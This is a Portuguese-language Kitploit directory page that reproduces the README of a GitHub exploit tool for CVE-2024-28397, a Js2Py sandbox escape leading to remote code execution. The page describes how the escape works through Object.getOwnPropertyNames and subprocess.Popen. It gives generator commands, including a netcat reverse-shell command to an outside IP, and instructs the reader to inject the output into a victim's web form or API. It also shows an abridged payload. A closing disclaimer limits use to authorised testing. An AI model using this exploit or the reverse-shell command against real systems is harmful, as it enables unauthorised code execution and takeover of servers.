Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-28397-Js2Py-RCE-Exploit — Exploit profissional para CVE-2024-28397: Escape do Sandbox Js2Py levando à Execução Remota de Código (RCE). Inclui geração modular de payloads. | Kitploit
Ferramentas/GitHubGitHub/xeloxa/cve-2024-28397-js2py-rce-exploit
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubxeloxa/cve-2024-28397-js2py-rce-exploit

CVE-2024-28397-Js2Py-RCE-Exploit

Exploit profissional para CVE-2024-28397: Escape do Sandbox Js2Py levando à Execução Remota de Código (RCE). Inclui geração modular de payloads.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver RepositórioSite
212há 7 mesesAinda não revisado
Compartilhar

Technical Briefing Preview

💡 Análise Aprofundada: Clique aqui para ler o briefing técnico completo (PDF).

CVE-2024-28397: Gerador de Payload para Escape de Sandbox do Js2Py

Python License CVE

Um gerador de payload profissional para CVE-2024-28397. Esta ferramenta gera código JavaScript malicioso projetado para escapar da sandbox do js2py (versões <= 0.74) e executar comandos arbitrários no sistema alvo.

🚨 Detalhes da Vulnerabilidade

  • ID CVE: CVE-2024-28397
  • Componente Afetado: Js2Py <= 0.74
  • Impacto: Execução Remota de Código (RCE) / Escape de Sandbox
  • Mecanismo: Explora Object.getOwnPropertyNames para acessar a classe subprocess.Popen do Python a partir do ambiente JavaScript.
  • 🚀 Uso

    Este script gera o payload JavaScript exato necessário para explorar a vulnerabilidade. Você não precisa instalar o js2py para usar esta ferramenta.

    1. Gerar um Payload

    Execute o script com o comando que deseja executar na máquina da vítima.

    root@kitploit:~
    # Gerar payload para executar 'id'
    python3 exploit.py -c "id"
    
    root@kitploit:~
    # Gerar payload para um Reverse Shell
    python3 exploit.py -c "nc -e /bin/bash 10.10.10.10 4444"
    

    2. Atacar o Alvo

    Copie a saída gerada pela ferramenta e injete-a na aplicação vulnerável (por exemplo, um formulário web, endpoint de API ou arquivo de configuração que seja interpretado pelo js2py).

    Exemplo de Injeção: Se um site recebe entrada do usuário e a executa com js2py.eval_js(user_input), colar o código gerado executará seu comando no servidor deles.

    📝 Exemplo

    root@kitploit:~
    $ python3 exploit.py -c "whoami"
    
        var output = "Initial";
        try {
            var leaked_wrapper = Object.getOwnPropertyNames({});
            // ... (código malicioso completo) ...
            var res = Popen("whoami", ...).communicate();
            output = res;
        } ...
        output
    

    👨‍💻 Autor

    Ali Sünbül (xeloxa)

    • 📧 Email: [email protected]
    • 🌐 Website: xeloxa.netlify.app
    • 🐙 GitHub: @xeloxa

    ⚠️ Aviso Legal

    Este software é fornecido exclusivamente para fins educacionais e de pesquisa em segurança. O autor não se responsabiliza por qualquer uso indevido deste código. Certifique-se de ter permissão explícita antes de testar isto em qualquer sistema que não seja de sua propriedade.

    Baixar ferramenta